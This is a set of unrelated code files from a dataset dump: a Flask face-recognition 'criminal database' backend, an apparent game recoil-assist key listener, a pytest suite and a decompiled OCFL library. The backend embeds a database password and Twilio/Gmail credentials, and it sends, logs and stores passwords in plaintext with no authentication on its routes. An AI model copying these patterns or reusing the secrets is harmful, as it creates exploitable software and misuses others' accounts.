recordCriminalFaceData(\"C:\\\\Users\\\\KS1\\\\Desktop\\\\sample.mp4\",0, face_id)\n\n\n@app.route('/recognize-from-footage')\ndef recognizeFromFootage():\n image_path = request.args['image-path']\n print(image_path)\n searchResult = performPredictionFromVideo(\"C:\\\\Users\\\\KS1\\\\Desktop\\\\\"+image_path)\n detectedList = []\n collection = db['trial_new']\n for x in searchResult.keys():\n print(x)\n res = collection.find_one({\"ID\" : int(x)},{ \"_id\": 0 })\n detectedList.append(res)\n print(detectedList) \n return jsonify(detectedList)\n\n\n@app.route('/full-list')\ndef fullList():\n response = []\n collection = db['trial_new']\n res = collection.find({},{ \"_id\": 0 ,'Image': 0})\n for i in res:\n response.append(i)\n return jsonify(response)\n \n\n@app.route('/recognition')\ndef recognizeRealTime():\n criminalsDetected = []\n collection = db[\"Crime_list\"]\n collection1 = db[\"timeline\"]\n res = collection.find({},{\"_id\":0,\"ID\": 1, \"Name\": 1, \"Recorded_Time\": 1})\n for i in res:\n message = \"The following criminal has been discovered in your area at camera 0:\"\n message += i['Name']\n criminalsDetected.append(i)\n res1 = collection.find_one_and_delete({\"ID\" : i[\"ID\"]})\n if collection1.find_one({\"ID\" : i[\"ID\"]}):\n collection1.find_one_and_update({\"ID\" : i[\"ID\"]}, {'$set': {\"Recorded_Time\": i[\"Recorded_Time\"]}})\n else:\n collection1.insert(res1)\n\n\n # client = Client(\"AC005dc1deb4ae1c3efd6265aeacf69997\", \"c4a9eb554443c3a39b8d8ba673f5a3a4\")\n # client.messages.create(to=\"+918553587952\", \n # from_=\"+12058439615\", \n # body=message)\n # with smtplib.SMTP_SSL(\"smtp.gmail.com\", port, context=context) as server:\n # server.login(\"rajlohith2@gmail.com\", password)\n # # TODO: Send email here\n # server.sendmail(sender_email, receiver_email, \"The following criminal has been discovered in your area at camera 0:\"+ i['Name'])\n print(criminalsDetected)\n return jsonify(criminalsDetected)\n\n@app.route('/search-by-id')\ndef searchById():\n detectedList = []\n id = request.args['id']\n collection = db[\"trial_new\"]\n res = collection.find_one({\"ID\" : int(id)},{ \"_id\": 0 })\n detectedList.append(res)\n return jsonify(detectedList)\n\n\n@app.route('/search-by-name')\ndef searchByName():\n detectedList = []\n fn = request.args['fn']\n ln = request.args['ln']\n collection = db[\"trial_new\"]\n res = collection.find_one({\"First_Name\" : fn, \"Last_Name\" : ln},{ \"_id\": 0 })\n detectedList.append(res)\n return jsonify(detectedList)\n\n@app.route('/admin-list')\ndef adminList():\n admins = []\n collection = db[\"admin_table\"]\n cursor = collection.find({},{ \"_id\": 0 })\n print(cursor)\n for document in cursor:\n print(document)\n admins.append(document)\n return jsonify(admins)\n\n\n@app.route('/add-criminal',methods = ['POST'])\ndef addCriminal():\n data = request.get_data()\n filter = {} \n collection = db[\"trial_new\"]\n doc_count = collection.count_documents(filter)\n currentNewUser = doc_count + 1\n print(type(data))\n data = json.loads(data)\n img = data['Image']\n\n # with open(\"C:\\\\Users\\\\rajlo\\\\front_end\\\\Images\\\\\"+ str(currentNewUser) +\".png\", \"wb\") as fh:\n # fh.write(img.decode('base64'))\n data.update({\"ID\" : currentNewUser})\n x = collection.insert_one(data)\n print(x.inserted_id)\n return jsonify({})\n\n@app.route('/login')\ndef login():\n user = request.args['user']\n password = request.args['pass']\n print(user)\n print(password)\n collection = db[\"admin_table\"]\n res = collection.find_one({\"User_id\" : user, \"password\" : password},{ \"_id\": 0 })\n print(res)\n if res== None:\n return jsonify({\"message\":\"failure\"})\n return jsonify({\"message\":\"success\"})\n\n\n@app.route('/add-user')\ndef addUser():\n user = request.args['user']\n password = request.args['pass']\n print(user)\n print(password)\n collection = db[\"admin_table\"]\n doc_count = collection.count_documents({})\n currentNewUser = doc_count + 1\n res = collection.insert_one({\"ID\": currentNewUser,\"User_id\" : user, \"password\" : password})\n print(res)\n return jsonify({\"message\":\"success\"})\n \n@app.route('/remove-user')\ndef removeUser():\n user = request.args['user']\n password = request.args['pass']\n print(user)\n print(password)\n collection = db[\"admin_table\"]\n res = collection.delete_one({\"User_id\" : user, \"password\" : password})\n print(res)\n return jsonify({\"message\":\"success\"})\n\n@app.route('/get-timeline')\ndef getTimeline():\n timelineList = []\n collection = db[\"timeline\"]\n res = collection.find({},{'_id':0})\n for i in res:\n timelineList.append(i)\n return jsonify(timelineList)\n\n\n@app.route('/get-home')\ndef getHome():\n timelineList = []\n collection = db[\"Crime_list\"]\n res = collection.count_documents({})\n return jsonify({'count': res})\n\n\n\nif __name__ == '__main__':\n manager = multiprocessing.Manager()\n c_list=manager.dict()\n pid = manager.list([0])\n path = 'dataset'\n\n recognizer = cv2.face.LBPHFaceRecognizer_create()\n detector = cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\n print (\"\\n [INFO] Training faces. It will take a few seconds. Wait ...\")\n faces,ids = getImagesAndLabels(path)\n recognizer.train(faces, np.array(ids))\n\n # Save the model into trainer/trainer.yml\n recognizer.write('trainer/trainer.yml') # recognizer.save() worked on Mac, but not on Pi\n\n # Print the numer of faces trained and end program\n print(\"\\n [INFO] {0} faces trained. Exiting Program\".format(len(np.unique(ids))))\n p = multiprocessing.Process(target = performPrediction,args = (\" \",0, c_list, pid))\n p.start()\n client = MongoClient('mongodb+srv://rajlohith2:bit123@criminal-database-drxaw.mongodb.net/test?retryWrites=true&w=majority')\n db = client.CriminalDB\n app.run()","sub_path":"Back end/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":16094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"402136154","text":"import threading\nimport time\nimport cv2\nimport numpy as np\nfrom pykeyboard import PyKeyboardEvent\n\nfrom tab_detection.tab_detection import Tab_Detector\nfrom b_detection.b_detection import B_Detector\nfrom auto_press_gun.press import Auto_down\nfrom lists import *\nfrom all_state import State\nfrom utils import get_screen\n\n\nclass Key_Listener(PyKeyboardEvent):\n def __init__(self):\n PyKeyboardEvent.__init__(self)\n self.all_state = State()\n\n self.t = Tab_Detector(self.all_state)\n self.b = B_Detector(self.all_state)\n self.ad = Auto_down()\n\n def tap(self, keycode, character, press):\n\n if keycode == 9 and press: # tab\n self.ad.m_listener_stop()\n screen = get_screen()\n threading.Timer(0.01, self.t.detect, args=[screen]).start()\n threading.Timer(0.5, self.check_fire_mode).start()\n\n if keycode == 123 and press: # F12\n self.ad.m_listener_stop()\n\n if keycode == 71 and press: # F12\n self.ad.m_listener_stop()\n\n if keycode == 66 and not press: # b\n threading.Timer(0.1, self.check_fire_mode).start()\n\n if keycode == 49 and press: # 1\n self.all_state.gun_state = 1\n self.all_state.update()\n print('gun0_name', self.all_state.gun0)\n threading.Timer(0.1, self.check_fire_mode).start()\n\n if keycode == 50 and press: # 2\n self.all_state.gun_state = 2\n self.all_state.update()\n print('gun0_name', self.all_state.gun0)\n threading.Timer(0.1, self.check_fire_mode).start()\n\n def check_fire_mode(self):\n self.all_state.update()\n if self.all_state.gun0 in full_mode_gun:\n screen = get_screen()\n self.b.detect(screen)\n print(self.all_state.fire_mode1)\n if self.all_state.fire_mode1 == 'full' and self.all_state.gun0 is not None:\n self.ad.reset(self.all_state.gun0, self.all_state.scope0)\n print(self.all_state.gun0, self.all_state.scope0)\n self.ad.m_listener_run()\n else:\n self.ad.m_listener_stop()\n\n def escape(self, event):\n return False\n\n\nk = Key_Listener()\nk.run()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"435240314","text":"\"\"\"\nFile: cities.py\nO.G. Author: C. D. Lima\n\"\"\"\n\nprompt = \"\\nPlease enter the name of a city you have visited: \"\nprompt += \"\\n(Enter 'quit' when you are finished.) \"\n\nwhile True:\n\tcity = input(prompt)\n\n\tif city == 'quit':\n\t\tbreak\n\telse:\n\t\tprint(\"I'd love to go to \" + city.title() + \"!\")\n\n","sub_path":"Documents/pythonfiles/python_c_c/Exer_Ch_7/cities.py","file_name":"cities.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"624872388","text":"import pytest\nimport tempfile\nimport os\nimport time\n\nfrom rafiki.client import Client\nfrom rafiki.constants import ModelAccessRight, TrainJobStatus\nfrom test.utils import make_model_dev, make_app_dev, make_model, make_private_model, \\\n gen, superadmin, DATASET_TRAIN_FILE_PATH, DATASET_VAL_FILE_PATH\n\nTRAIN_JOB_TIMEOUT_SECS = 5 * 60\n \nclass TestTrainJobs():\n\n @pytest.fixture(scope='class')\n def app_dev_create_train_job_and_waited(self):\n (task, app, model_id, train_dataset_uri, val_dataset_uri, budget) = make_train_job_info()\n app_dev = make_app_dev()\n\n # Create train job\n train_job = app_dev.create_train_job(app, task, train_dataset_uri, val_dataset_uri, budget, models=[model_id])\n assert 'id' in train_job\n train_job_id = train_job['id']\n\n # Wait until train job stops\n wait_until_train_job_stops(app, app_dev)\n\n return (app_dev, app, train_job_id, task)\n\n def test_app_dev_create_train_job(self, app_dev_create_train_job_and_waited):\n (app_dev, app, train_job_id, *args) = app_dev_create_train_job_and_waited\n app_dev: Client\n\n # View train job\n train_job = app_dev.get_train_job(app)\n assert train_job['id'] == train_job_id\n assert train_job['app'] == app\n assert 'status' in train_job\n \n # Get train job by user\n user = app_dev.get_current_user()\n user_id = user['id']\n train_jobs = app_dev.get_train_jobs_by_user(user_id)\n assert any([x['id'] == train_job_id for x in train_jobs])\n\n # Get train job by app\n train_jobs = app_dev.get_train_jobs_of_app(app)\n assert any([x['id'] == train_job_id for x in train_jobs])\n\n def test_app_dev_get_trials(self, app_dev_create_train_job_and_waited):\n (app_dev, app, *args) = app_dev_create_train_job_and_waited\n app_dev: Client\n\n # Get trials of stopped train job\n trials = app_dev.get_trials_of_train_job(app)\n assert len(trials) > 0\n\n # Get best trials of stopped train job\n best_trials = app_dev.get_best_trials_of_train_job(app)\n assert len(best_trials) > 0\n\n\n def test_app_dev_get_trial(self, app_dev_create_train_job_and_waited):\n (app_dev, app, *args) = app_dev_create_train_job_and_waited\n app_dev: Client\n\n # Get a trial\n trials = app_dev.get_trials_of_train_job(app)\n assert len(trials) > 0\n trial = trials[0]\n assert 'id' in trial\n trial_id = trial['id']\n\n # Get info for a trial\n trial = app_dev.get_trial(trial_id)\n assert trial['id'] == trial_id\n assert all([(x in trial) for x in ['knobs', 'status', 'score', 'datetime_started', 'datetime_stopped']])\n \n \n def test_app_dev_get_trial_logs(self, app_dev_create_train_job_and_waited):\n (app_dev, app, *args) = app_dev_create_train_job_and_waited\n app_dev: Client\n\n # Get a trial\n trials = app_dev.get_trials_of_train_job(app)\n assert len(trials) > 0\n trial = trials[0]\n assert 'id' in trial\n trial_id = trial['id']\n\n # Get logs for trial\n logs = app_dev.get_trial_logs(trial_id)\n assert len(logs) > 0\n\n\n def test_app_dev_create_2nd_app_version(self, app_dev_create_train_job_and_waited):\n (app_dev, app, task, *args) = app_dev_create_train_job_and_waited\n (_, _, model_id, train_dataset_uri, val_dataset_uri, budget) = make_train_job_info(task=task) # Get another set of job info\n app_dev: Client\n \n # Create another train job\n train_job = app_dev.create_train_job(app, task, train_dataset_uri, val_dataset_uri, budget, models=[model_id])\n assert train_job['app'] == app\n assert train_job['app_version'] == 2 # 2nd version of the train job\n\n\n def test_multiple_app_devs_use_same_app(self, app_dev_create_train_job_and_waited):\n (app_dev, app, task, *args) = app_dev_create_train_job_and_waited\n (_, _, model_id, train_dataset_uri, val_dataset_uri, budget) = make_train_job_info(task=task) # Get another set of job info\n app_dev2 = make_app_dev()\n \n # App dev 2 create another train job with same app\n train_job = app_dev2.create_train_job(app, task, train_dataset_uri, val_dataset_uri, budget, models=[model_id])\n assert train_job['app'] == app\n assert train_job['app_version'] == 1 # Should not increment\n\n\n def test_app_dev_cant_view_others_job(self, app_dev_create_train_job_and_waited):\n (app_dev, app, task, *args) = app_dev_create_train_job_and_waited\n app_dev: Client\n app_dev_user = app_dev.get_current_user()\n app_dev_id = app_dev_user['id']\n app_dev2 = make_app_dev()\n\n with pytest.raises(Exception):\n app_dev2.get_train_jobs_by_user(app_dev_id)\n\n\n def test_app_dev_stop_train_job(self):\n (task, app, model_id, train_dataset_uri, val_dataset_uri, budget) = make_train_job_info()\n app_dev = make_app_dev()\n\n # Create train job\n train_job = app_dev.create_train_job(app, task, train_dataset_uri, val_dataset_uri, budget, models=[model_id])\n assert 'id' in train_job\n\n # Stop train job\n app_dev.stop_train_job(app)\n\n # Train job should have stopped\n train_job = app_dev.get_train_job(app)\n assert train_job['status'] == TrainJobStatus.STOPPED\n \n\n def test_app_dev_create_train_job_with_gpu(self):\n (task, app, model_id, train_dataset_uri, val_dataset_uri, budget) = make_train_job_info()\n budget['GPU_COUNT'] = 1 # Activate GPU\n app_dev = make_app_dev()\n \n # Create train job\n train_job = app_dev.create_train_job(app, task, train_dataset_uri, val_dataset_uri, budget, models=[model_id])\n assert 'id' in train_job\n\n # Wait until train job stops\n wait_until_train_job_stops(app, app_dev)\n\n # Train job should have stopped without error\n train_job = app_dev.get_train_job(app)\n assert train_job['status'] == TrainJobStatus.STOPPED\n\n # Train job should have trials\n trials = app_dev.get_trials_of_train_job(app)\n assert len(trials) > 0\n\n\n def test_app_dev_cant_use_private_model(self):\n (task, app, model_id, train_dataset_uri, val_dataset_uri, budget) = make_train_job_info()\n model_id = make_private_model() # Have private model created\n app_dev = make_app_dev()\n\n # Can't create train job with private model\n with pytest.raises(Exception):\n app_dev.create_train_job(app, task, train_dataset_uri, val_dataset_uri, budget, models=[model_id])\n\n\ndef make_train_job_info(task=None):\n task = task or gen()\n app = gen()\n model_id = make_model(task=task)\n train_dataset_uri = DATASET_TRAIN_FILE_PATH\n val_dataset_uri = DATASET_VAL_FILE_PATH\n budget = { 'MODEL_TRIAL_COUNT': 1 }\n\n return (task, app, model_id, train_dataset_uri, val_dataset_uri, budget)\n\n\ndef wait_until_train_job_stops(app, client: Client):\n length = 0\n timeout = TRAIN_JOB_TIMEOUT_SECS\n tick = 1\n\n while True:\n train_job = client.get_train_job(app)\n status = train_job['status']\n if status not in [TrainJobStatus.STARTED, TrainJobStatus.RUNNING]:\n # Train job has stopped\n return\n \n # Still running...\n if length >= timeout:\n raise TimeoutError('Train job is running for too long')\n\n length += tick\n time.sleep(tick)\n","sub_path":"test/test_train_jobs.py","file_name":"test_train_jobs.py","file_ext":"py","file_size_in_byte":7576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"550549496","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.14-x86_64/egg/ocfl/object.py\n# Compiled at: 2020-04-20 18:40:35\n# Size of source mod 2**32: 27310 bytes\n\"\"\"Core of OCFL Object library.\"\"\"\nimport copy, hashlib, json, os, os.path, re, logging\nfrom shutil import copyfile\nimport sys\ntry:\n from urllib.parse import quote as urlquote\nexcept ImportError:\n from urllib import quote as urlquote\n\nfrom .digest import file_digest, normalized_digest\nfrom .inventory_validator import InventoryValidator\nfrom .object_utils import remove_first_directory, make_unused_filepath, next_version, add_object_args\nfrom .namaste import Namaste\nfrom .validator import OCFLValidator\nfrom .version import VersionMetadata\n\nclass ObjectException(Exception):\n __doc__ = 'Exception class for OCFL Object.'\n\n\nclass Object(object):\n __doc__ = 'Class for handling OCFL Object data and operations.'\n\n def __init__(self, id=None, content_directory='content', digest_algorithm='sha512', filepath_normalization='uri', skips=None, forward_delta=True, dedupe=True, lax_digests=False, ocfl_version='draft', fixity=None, fhout=sys.stdout):\n \"\"\"Initialize OCFL builder.\n\n Parameters:\n forward_delta - set False to turn off foward delta\n dedupe - set False to turn off dedupe within versions\n fixity - list of fixity types to add as fixity section\n fhout - optional overwrite of STDOUT for print outputs\n \"\"\"\n self.id = id\n self.content_directory = content_directory\n self.digest_algorithm = digest_algorithm\n self.filepath_normalization = filepath_normalization\n self.skips = set() if skips is None else set(skips)\n self.forward_delta = forward_delta\n self.dedupe = dedupe\n self.ocfl_version = ocfl_version\n self.fixity = fixity\n self.lax_digests = lax_digests\n self.src_files = {}\n self.fhout = fhout\n\n def parse_version_directory(self, dirname):\n \"\"\"Get version number from version directory name.\"\"\"\n m = re.match('v(\\\\d{1,5})$', dirname)\n if not m:\n raise Exception('Bad version directory name: %s' % dirname)\n v = int(m.group(1))\n if v == 0:\n raise Exception('Bad version directory name: %s, v0 no allowed' % dirname)\n return v\n\n def digest(self, filename):\n \"\"\"Digest for file filename.\"\"\"\n return file_digest(filename, self.digest_algorithm)\n\n def map_filepath(self, filepath, vdir, used):\n \"\"\"Map source filepath to a name within object.\n\n The purpose of the mapping might be normalization, sanitization,\n content distribution, or something else.\n\n Parameters:\n filepath - the source filepath\n vdir - the current version directory\n used - disctionary used to check whether a given vfilepath has\n been used already\n\n Returns:\n vfilepath - the version filepath for this content that starts\n with vdir/content_directory/\n \"\"\"\n if self.filepath_normalization == 'uri':\n filepath = urlquote(filepath)\n if filepath[0] == '.':\n filepath = '%2E' + filepath[1:]\n else:\n if self.filepath_normalization == 'md5':\n filepath = hashlib.md5(filepath.encode('utf-8')).hexdigest()[0:16]\n else:\n if self.filepath_normalization is not None:\n raise Exception(\"Unknown filepath normalization '%s' requested\" % self.filepath_normalization)\n vfilepath = os.path.join(vdir, self.content_directory, filepath)\n if vfilepath in used:\n vfilepath = make_unused_filepath(vfilepath, used)\n return vfilepath\n\n def start_inventory(self):\n \"\"\"Create inventory start with metadata from self.\"\"\"\n inventory = {'id':self.id, \n 'type':'https://ocfl.io/1.0/spec/#inventory', \n 'digestAlgorithm':self.digest_algorithm, \n 'versions':{}, 'manifest':{}}\n if self.content_directory != 'content':\n inventory['contentDirectory'] = self.content_directory\n elif self.fixity is not None and len(self.fixity) > 0:\n inventory['fixity'] = {}\n for fixity_type in self.fixity:\n inventory['fixity'][fixity_type] = {}\n\n else:\n self.fixity = None\n return inventory\n\n def add_version(self, inventory, srcdir, vdir, metadata=None):\n \"\"\"Add to inventory data for new version based on files in srcdir.\n\n Parameters:\n inventory - the inventory up to (vdir-1)\n srcdir - the directory path where the files for this new version exist,\n including any version directory that might be present\n vdir - the version directory that these files are being added in\n metadata - a VersionMetadata object\n\n Returns:\n manifest_to_srcfile - dict mapping from paths in manifest to the full\n path of the source file that should be include in the content for\n this new version\n \"\"\"\n state = {}\n manifest = inventory['manifest']\n digests_in_version = {}\n manifest_to_srcfile = {}\n inv_file = srcdir + '_inventory.json'\n if os.path.isfile(inv_file):\n metadata.from_inventory_file(inv_file, vdir)\n for dirpath, dirnames, filenames in os.walk(srcdir, followlinks=True):\n for filename in sorted(filenames):\n filepath = os.path.join(dirpath, filename)\n print('-o-> ' + filepath)\n sfilepath = os.path.relpath(filepath, srcdir)\n vfilepath = self.map_filepath(sfilepath, vdir, manifest_to_srcfile)\n digest = self.digest(filepath)\n if digest not in state:\n state[digest] = []\n state[digest].append(sfilepath)\n if self.forward_delta:\n if digest in manifest:\n print('... already have content for digest %s' % digest)\n continue\n if digest not in digests_in_version:\n digests_in_version[digest] = [\n vfilepath]\n else:\n if not self.dedupe:\n digests_in_version[digest].append(vfilepath)\n manifest_to_srcfile[vfilepath] = filepath\n print('... %s -> %s' % (vfilepath, filepath))\n\n for digest, paths in digests_in_version.items():\n if digest not in manifest:\n manifest[digest] = paths\n else:\n for p in paths:\n manifest[digest].append(p)\n\n if self.fixity is not None:\n for fixity_type in self.fixity:\n fixities = inventory['fixity'][fixity_type]\n for digest, vfilepaths in digests_in_version.items():\n for vfilepath in vfilepaths:\n fixity_digest = file_digest(manifest_to_srcfile[vfilepath], fixity_type)\n if fixity_digest not in fixities:\n fixities[fixity_digest] = [\n vfilepath]\n else:\n fixities[fixity_digest].append(vfilepath)\n\n inventory['head'] = vdir\n inventory['versions'][vdir] = metadata.as_dict(state=state)\n return manifest_to_srcfile\n\n def build_inventory(self, path, metadata=None):\n \"\"\"Generator for building an OCFL inventory.\n\n Yields (vdir, inventory, manifest_to_srcfile) for each version in sequence,\n where vdir is the version directory name, inventory is the inventory for that\n version, and manifest_to_srcfile is a dictionary that maps filepaths in the\n manifest to actual source filepaths.\n \"\"\"\n inventory = self.start_inventory()\n versions = {}\n for vdir in os.listdir(path):\n if not vdir in self.skips:\n if not os.path.isdir(os.path.join(path, vdir)):\n pass\n else:\n vn = self.parse_version_directory(vdir)\n versions[vn] = vdir\n\n for vn in sorted(versions.keys()):\n vdir = versions[vn]\n manifest_to_srcfile = self.add_version(inventory, (os.path.join(path, vdir)), vdir, metadata=metadata)\n yield (vdir, inventory, manifest_to_srcfile)\n\n def write_object_declaration(self, objdir):\n \"\"\"Write NAMASTE object declaration to objdir.\"\"\"\n Namaste(0, 'ocfl_object_1.0').write(objdir)\n\n def write_inventory_and_sidecar(self, objdir, inventory):\n \"\"\"Write inventory and sidecar to objdir.\"\"\"\n invfilename = 'inventory.json'\n if not os.path.exists(objdir):\n os.makedirs(objdir)\n invfile = os.path.join(objdir, invfilename)\n with open(invfile, 'w') as (fh):\n json.dump(inventory, fh, sort_keys=True, indent=2)\n sidecar = os.path.join(objdir, invfilename + '.' + self.digest_algorithm)\n digest = file_digest(invfile, self.digest_algorithm)\n with open(sidecar, 'w') as (fh):\n fh.write(digest + ' ' + invfilename + '\\n')\n\n def build(self, srcdir, metadata=None, objdir=None):\n \"\"\"Build an OCFL object and write to objdir if set, else print inventories.\n\n Parameters:\n srcdir - source directory with version sub-directories\n metadata - VersionMetadata object applied to all versions\n objdir - output directory for object (must not already exist), if not\n set then will just write out inventories that would have been\n created\n \"\"\"\n if self.id is None:\n raise ObjectException('Identifier is not set!')\n else:\n if objdir is not None:\n os.makedirs(objdir)\n num_versions = 0\n for vdir, inventory, manifest_to_srcfile in self.build_inventory(srcdir, metadata=metadata):\n num_versions += 1\n if objdir is None:\n self.prnt('\\n\\n### Inventory for %s\\n' % vdir)\n self.prnt(json.dumps(inventory, sort_keys=True, indent=2))\n else:\n self.write_inventory_and_sidecar(os.path.join(objdir, vdir), inventory)\n for path, srcfile in manifest_to_srcfile.items():\n dstfile = os.path.join(objdir, path)\n dstpath = os.path.dirname(dstfile)\n if not os.path.exists(dstpath):\n os.makedirs(dstpath)\n copyfile(srcfile, dstfile)\n\n if objdir is None:\n return\n self.write_object_declaration(objdir)\n self.write_inventory_and_sidecar(objdir, inventory)\n logging.info('Built object %s with %s versions' % (self.id, num_versions))\n\n def create(self, srcdir, metadata=None, objdir=None):\n \"\"\"Create a new OCFL object with v1 content from srcdir.\n\n Parameters:\n srcdir - source directory with content for v1\n metadata - VersionMetadata object for v1\n objdir - output directory for object (must not already exist), if not\n set then will just write out inventories that would have been\n created\n \"\"\"\n if self.id is None:\n raise ObjectException('Identifier is not set!')\n else:\n if objdir is not None:\n os.makedirs(objdir)\n inventory = self.start_inventory()\n vdir = 'v1'\n manifest_to_srcfile = self.add_version(inventory, srcdir, vdir, metadata=metadata)\n if objdir is None:\n self.prnt('\\n\\n### Inventory for %s\\n' % vdir)\n self.prnt(json.dumps(inventory, sort_keys=True, indent=2))\n return\n self.write_inventory_and_sidecar(os.path.join(objdir, vdir), inventory)\n self.write_object_declaration(objdir)\n self.write_inventory_and_sidecar(objdir, inventory)\n for digest, paths in inventory['manifest'].items():\n for path in paths:\n srcfile = manifest_to_srcfile[path]\n dstfile = os.path.join(objdir, path)\n dstpath = os.path.dirname(dstfile)\n if not os.path.exists(dstpath):\n os.makedirs(dstpath)\n copyfile(srcfile, dstfile)\n\n logging.info('Created OCFL object %s in %s' % (self.id, objdir))\n\n def update(self, objdir, srcdir=None, metadata=None):\n \"\"\"Update object creating a new version with content matching srcdir.\n\n Parameters:\n objdir - directory for object to be update, must contain a valid object!\n srcdir - source directory with version sub-directories\n metadata - VersionMetadata object applied to all versions\n\n If srcdir is None then the update will be just of metadata and any settings\n (such as using a new digest). There will be no content change between\n versions.\n \"\"\"\n validator = OCFLValidator(warnings=False, check_digests=False, lax_digests=(self.lax_digests))\n if not validator.validate(objdir):\n raise ObjectException(\"Object at '%s' is not valid, aborting\" % objdir)\n inventory = self.parse_inventory(objdir)\n self.id = inventory['id']\n old_head = inventory['head']\n versions = inventory['versions']\n head = next_version(old_head)\n logging.info('Will update %s %s -> %s' % (self.id, old_head, head))\n os.mkdir(os.path.join(objdir, head))\n old_digest_algorithm = inventory['digestAlgorithm']\n digest_algorithm = self.digest_algorithm\n if digest_algorithm is None:\n digest_algorithm = old_digest_algorithm\n else:\n if digest_algorithm != old_digest_algorithm:\n logging.info('New version with use %s instead of %s digestAlgorithm' % (\n digest_algorithm, old_digest_algorithm))\n inventory['digestAlgorithm'] = digest_algorithm\n else:\n fixity = self.fixity\n old_fixity = set(inventory['fixity'].keys()) if 'fixity' in inventory else set()\n if fixity is None:\n fixity = old_fixity.copy()\n if digest_algorithm != old_digest_algorithm:\n if old_digest_algorithm not in old_fixity:\n if 'fixity' not in inventory:\n inventory['fixity'] = {}\n inventory['fixity'][old_digest_algorithm] = inventory['manifest'].copy()\n fixity.add(old_digest_algorithm)\n else:\n fixity = set(fixity)\n if fixity != old_fixity:\n for digest in old_fixity.difference(fixity):\n inventory['fixity'].pop(digest)\n\n for digest in fixity.difference(old_fixity):\n logging.info('FIXME - need to add fixity with digest %s' % digest)\n\n if fixity != old_fixity:\n logging.info('New version will have %s instead of %s fixity' % (\n ','.join(sorted(fixity)), ','.join(sorted(old_fixity))))\n manifest = copy.deepcopy(inventory['manifest'])\n if digest_algorithm != old_digest_algorithm:\n old_to_new_digest = {}\n new_manifest = {}\n for old_digest, files in manifest.items():\n digest = file_digest(os.path.join(objdir, files[0]), digest_algorithm)\n old_to_new_digest[old_digest] = digest\n for file in files[1:]:\n d = file_digest(os.path.join(objdir, file), digest_algorithm)\n if d != digest:\n raise ObjectException('Failed sanity check - files %s and %s should have same %s digest but calculated %s and %s respectively' % files[0], file, digest_algorithm, digest, d)\n\n new_manifest[digest] = manifest[old_digest]\n\n manifest = new_manifest\n for vdir in inventory['versions']:\n old_state = inventory['versions'][vdir]['state']\n state = {}\n for old_digest, files in old_state.items():\n state[old_to_new_digest[old_digest]] = old_state[old_digest]\n\n inventory['versions'][vdir]['state'] = state\n\n inventory['manifest'] = manifest\n if srcdir is None:\n inventory['head'] = head\n state = copy.deepcopy(inventory['versions'][old_head]['state'])\n inventory['versions'][head] = metadata.as_dict(state=state)\n else:\n manifest_to_srcfile = self.add_version(inventory=inventory, srcdir=srcdir, vdir=head, metadata=metadata)\n print('m2s ' + str(manifest_to_srcfile))\n for path, srcfile in manifest_to_srcfile.items():\n print('--s-> %s %s' % (path, srcfile))\n dstfile = os.path.join(objdir, path)\n dstpath = os.path.dirname(dstfile)\n if not os.path.exists(dstpath):\n os.makedirs(dstpath)\n copyfile(srcfile, dstfile)\n\n self.write_inventory_and_sidecar(os.path.join(objdir, head), inventory)\n self.write_inventory_and_sidecar(objdir, inventory)\n if digest_algorithm != old_digest_algorithm:\n os.remove(os.path.join(objdir, 'inventory.json.' + old_digest_algorithm))\n logging.info('Updated OCFL object %s in %s by adding %s' % (self.id, objdir, head))\n\n def _show_indent(self, level, last=False, last_v=False):\n \"\"\"Indent string for tree view at level for intermediate or last.\"\"\"\n tree_next = '├── '\n tree_last = '└── '\n tree_pass = '│ '\n tree_indent = ' '\n if level == 0:\n if last:\n return tree_last\n return tree_next\n else:\n return (tree_indent if last else tree_pass) + (tree_last if last_v else tree_next)\n\n def show(self, objdir):\n \"\"\"Show OCFL object at objdir.\"\"\"\n validator = OCFLValidator(warnings=False, check_digests=False, lax_digests=(self.lax_digests))\n passed = validator.validate(objdir)\n if passed:\n self.prnt('OCFL object at %s has VALID STRUCTURE (DIGESTS NOT CHECKED) ' % objdir)\n else:\n self.prnt('OCFL object at %s is INVALID' % objdir)\n self.prnt()\n self.prnt('[' + objdir + ']')\n entries = sorted(os.listdir(objdir))\n n = 0\n seen_sidecar = False\n for entry in entries:\n n += 1\n note = entry + ' '\n v_notes = []\n if re.match('v\\\\d+$', entry):\n seen_v_sidecar = False\n for v_entry in sorted(os.listdir(os.path.join(objdir, entry))):\n v_note = v_entry + ' '\n if v_entry == 'inventory.json':\n pass\n elif v_entry.startswith('inventory.json.'):\n if seen_v_sidecar:\n v_note += '<--- multiple inventory digests?'\n seen_v_sidecar = True\n else:\n if v_entry == 'content':\n num_files = 0\n for v_dirpath, v_dirs, v_files in os.walk((os.path.join(objdir, entry, v_entry)), followlinks=True):\n num_files += len(v_files)\n\n v_note += '(%d files)' % num_files\n else:\n v_note += '<--- ???'\n v_notes.append(v_note)\n\n else:\n if entry in ('0=ocfl_object_1.0', 'inventory.json'):\n pass\n else:\n if entry.startswith('inventory.json.'):\n if seen_sidecar:\n note += '<--- multiple inventory digests?'\n seen_sidecar = True\n else:\n note += '<--- ???'\n last = n == len(entries)\n self.prnt(self._show_indent(0, last) + note)\n nn = 0\n for v_note in v_notes:\n nn += 1\n self.prnt(self._show_indent(1, last, nn == len(v_notes)) + v_note)\n\n def validate(self, objdir, warnings=False, check_digests=True):\n \"\"\"Validate OCFL object at objdir.\"\"\"\n validator = OCFLValidator(warnings=warnings, check_digests=check_digests, lax_digests=(self.lax_digests))\n passed = validator.validate(objdir)\n self.prnt(str(validator))\n if passed:\n self.prnt('OCFL object at %s is VALID' % objdir)\n else:\n self.prnt('OCFL object at %s is INVALID' % objdir)\n return passed\n\n def extract(self, objdir, version, dstdir):\n \"\"\"Extract version from object at objdir into dstdir.\n\n The dstdir itself must not exist but the parent directory must.\n\n 